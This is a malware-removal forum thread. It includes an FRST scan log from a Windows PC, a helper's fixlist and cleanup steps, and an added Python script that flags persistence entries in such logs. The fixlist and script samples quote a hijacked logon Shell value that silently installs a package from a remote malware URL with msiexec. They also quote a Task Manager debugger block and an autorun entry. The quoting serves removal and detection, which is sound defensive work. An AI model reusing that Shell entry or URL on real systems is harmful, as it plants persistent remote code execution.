2017-04-12 14:25 - 2009-07-14 14:55 - 00147638 _____ C:\Windows\system32\prfc0416.dat
2017-04-12 14:25 - 2009-07-14 02:13 - 01635826 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-12 14:25 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\inf
2017-04-12 14:19 - 2017-01-21 09:27 - 00000000 ____D C:\Users\Biel\AppData\Roaming\uTorrent
2017-04-12 14:19 - 2016-12-29 11:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-04-12 14:19 - 2016-10-31 16:07 - 00101080 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\wsddfac.sys
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\Users\Todos os Usuários\GbPlugin
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\ProgramData\GbPlugin
2017-04-12 14:19 - 2016-10-31 15:59 - 00000000 ____D C:\Program Files (x86)\GbPlugin
2017-04-12 14:19 - 2016-10-29 03:30 - 00000000 ____D C:\Users\Todos os Usuários\NVIDIA
2017-04-12 14:19 - 2016-10-29 03:30 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-12 14:19 - 2009-07-14 02:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-12 14:05 - 2016-11-01 15:55 - 00000000 ____D C:\Users\Biel\AppData\Local\CrashDumps
2017-04-11 19:00 - 2016-10-29 19:33 - 00003676 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2097341823-3435128210-3467763070-1000UA
2017-04-11 19:00 - 2016-10-29 19:33 - 00003404 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2097341823-3435128210-3467763070-1000Core
2017-04-11 16:22 - 2017-01-06 11:33 - 00000000 ____D C:\Users\Todos os Usuários\ProductData
2017-04-11 16:22 - 2017-01-06 11:33 - 00000000 ____D C:\ProgramData\ProductData
2017-04-11 13:25 - 2016-10-29 03:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-11 13:25 - 2016-10-29 03:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-11 13:25 - 2016-10-29 03:46 - 00004384 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-11 13:25 - 2016-10-29 03:46 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 13:25 - 2016-10-29 03:46 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-11 13:20 - 2017-01-06 11:44 - 00000000 ____D C:\Users\Biel\AppData\Roaming\ScreenShot
2017-04-10 21:27 - 2017-01-06 12:51 - 00000000 ____D C:\Users\Biel\Desktop\Gabriel
2017-04-10 21:04 - 2017-01-06 13:08 - 00000000 ____D C:\Users\Biel\Documents\GTA San Andreas User Files
2017-04-10 09:57 - 2017-01-06 13:14 - 00000000 ____D C:\Users\Biel\Desktop\Simone
2017-04-09 14:49 - 2017-01-08 12:59 - 00000000 ____D C:\Users\Todos os Usuários\AVAST Software
2017-04-09 14:49 - 2017-01-08 12:59 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-06 13:23 - 2009-07-14 02:08 - 00032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-04-05 13:41 - 2017-01-08 13:02 - 00003896 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1483891368
2017-04-05 13:41 - 2009-07-14 02:32 - 00000000 ____D C:\Program Files\Windows Sidebar
2017-04-04 18:42 - 2017-01-08 13:02 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 01005048 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00556784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00164064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00127112 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-04-04 18:42 - 2017-01-08 13:00 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-04-03 23:13 - 2016-10-29 03:43 - 00002368 _____ C:\Users\Biel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-01 10:28 - 2009-07-14 00:20 - 00000000 ____D C:\Windows\system32\NDF
2017-03-16 14:38 - 2017-03-07 16:50 - 00640783 _____ C:\Users\Biel\Documents\Apresentação1.pptx
2017-03-15 20:06 - 2017-02-06 18:47 - 00000000 ____D C:\Users\Biel\Desktop\Trabalhos
2017-03-15 14:37 - 2016-10-29 03:52 - 00000000 ____D C:\Users\Todos os Usuários\Package Cache
2017-03-15 14:37 - 2016-10-29 03:52 - 00000000 ____D C:\ProgramData\Package Cache
2017-03-15 14:37 - 2016-10-29 03:48 - 00000000 ____D C:\Users\Todos os Usuários\Skype
2017-03-15 14:37 - 2016-10-29 03:48 - 00000000 ____D C:\ProgramData\Skype
 
==================== Arquivos na raiz de alguns diretórios =======
 
2016-10-29 03:34 - 2016-10-29 03:34 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(Não há correção automática para arquivos que não passaram na verificação.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-04-03 21:55
 
==================== End of FRST.txt ============================
 
NEED HELP HERE PLEASE!!!

Edited by IDFs0ldier, 13 April 2017 - 10:38 AM.


#2 nasdaq (Malware Response Team, 40,182 posts, Montreal, QC. Canada)

Posted 14 April 2017 - 09:45 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click OK.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
IFEO\taskmgr.exe: [Debugger]
GroupPolicy: Restriction <======= ATTENTION
CHR Extension: (Avast Online Security) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-05]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Chrome Media Router) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please download Malwarebytes Anti-Malware from here
  • Right-click on the MBAM icon and select Run as administrator to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • Once the MBAM dashboard opens, on the right detail pane click on the word "Current" under the Scan Status to update the tool database.
  • On the left menu pane click the Settings tab, and then select the Protection tab on the top.
  • Under the Scan Options, turn on the button Scan for rootkits and Scan within archives.
  • Click the Scan tab on the right detail pane, select Threat Scan and click the Start Scan button
  • Note: The scan may take some time to finish, so please be patient.
  • If potential threats are detected, ensure to checkmark all the listed items, and click the Quarantine Selected button.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
Please post the log for my review.

Note: If asked to restart the computer, please do so immediately.
===

Open Google Chrome and click on the menu icon, which is located at the top right of Google Chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.

Please post the logs and let me know what problem persists.

Include also for my review the Addition.txt log that was created by the Farbar tool.
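The fixlist above bundles several different things: a per-user Policies\System Shell value that starts msiexec.exe with a remote URL at logon alongside explorer.exe, an Image File Execution Options Debugger entry for taskmgr.exe, a cached MountPoints2 autorun for a removable drive, and services whose driver files FRST could not find (the [X] marker). The following Python script is an added example, not code from this thread or from FRST, that applies that reasoning to FRST log lines so the same indicators can be spotted in other logs. The line formats are taken from the entries quoted in the fixlist; the rule names, the severity labels and the extra clean HKLM Winlogon line in the sample are assumptions made for the example.

```python
"""Triage FRST log lines for logon persistence and tampering indicators.

Added example, not part of the BleepingComputer thread or of FRST itself.
Line formats are assumed from the entries quoted in the fixlist above.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input: the fixlist entries above plus one assumed clean
# HKLM Winlogon Shell line, included so the Shell rule can be seen not firing.
SAMPLE_LINES = r"""
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
IFEO\taskmgr.exe: [Debugger]
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
HKLM\...\Winlogon: [Shell] explorer.exe
"""

SHELL_RE = re.compile(r"^(?P<key>HK(?:U|LM)\\\S*?): \[Shell\] (?P<value>.+)$")
IFEO_RE = re.compile(r"^IFEO\\(?P<target>[^:]+): \[Debugger\]\s*(?P<debugger>.*)$")
MOUNT_RE = re.compile(r"^(?P<key>HKU\\\S*?\\MountPoints2): \{(?P<guid>[0-9a-fA-F-]+)\} - (?P<target>.+)$")
SERVICE_RE = re.compile(r"^(?P<start>[SRU]\d) (?P<name>[^;]+); (?P<path>.+?) \[X\]$")
URL_RE = re.compile(r"https?://\S+")


@dataclass
class Finding:
    rule: str       # assumed rule name, e.g. "shell-hijack"
    severity: str   # assumed label: high / medium / low
    key: str        # registry key or service name the finding is about
    detail: str


def shell_components(value: str) -> list[str]:
    """The Winlogon Shell value is a comma-separated list of programs to start.
    Return the lower-cased basename of each program, without its arguments."""
    comps = []
    for entry in value.split(","):
        entry = entry.strip()
        if not entry:
            continue
        program = entry.split()[0]  # drop arguments such as "/i <url> /q"
        comps.append(program.replace("/", "\\").rsplit("\\", 1)[-1].lower())
    return comps


def triage(lines) -> list[Finding]:
    """Apply the four rules to each FRST line and collect what fires."""
    findings: list[Finding] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        m = SHELL_RE.match(line)
        if m:
            # Anything other than explorer.exe in Shell runs at every logon.
            extra = [c for c in shell_components(m["value"]) if c != "explorer.exe"]
            if extra:
                detail = f"Shell starts {', '.join(extra)} alongside explorer.exe"
                urls = URL_RE.findall(m["value"])
                if urls:
                    detail += f"; remote package installed at logon: {' '.join(urls)}"
                findings.append(Finding("shell-hijack", "high", m["key"], detail))
            continue
        m = IFEO_RE.match(line)
        if m:
            # A Debugger value makes Windows start that program instead of the
            # target; an empty or invalid value typically stops the target from
            # launching at all, which is how Task Manager gets disabled.
            dbg = m["debugger"].strip() or "<empty>"
            findings.append(Finding("ifeo-debugger", "high", f"IFEO\\{m['target']}",
                                    f"Debugger={dbg} set for {m['target']}"))
            continue
        m = MOUNT_RE.match(line)
        if m:
            findings.append(Finding("mountpoints-autorun", "medium", m["key"],
                                    f"cached autorun for volume {{{m['guid']}}} -> {m['target']}"))
            continue
        m = SERVICE_RE.match(line)
        if m:
            # [X] is FRST's marker for a service whose file does not exist.
            findings.append(Finding("orphaned-service", "low", m["name"],
                                    f"{m['start']} service with missing driver file {m['path']}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES.splitlines()):
        print(f"[{f.severity}] {f.rule}: {f.key}: {f.detail}")
```

The Shell rule is deliberately strict: it flags any program other than explorer.exe, because a legitimate per-user Policies\System Shell override is rare on a home machine. The orphaned-service rule is only informational; a driver whose file is gone cannot load, so those entries are cleanup rather than an active threat.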

#3 nasdaq (Malware Response Team, 40,182 posts, Montreal, QC. Canada)

Posted 20 April 2017 - 07:40 AM

Are you still with me?
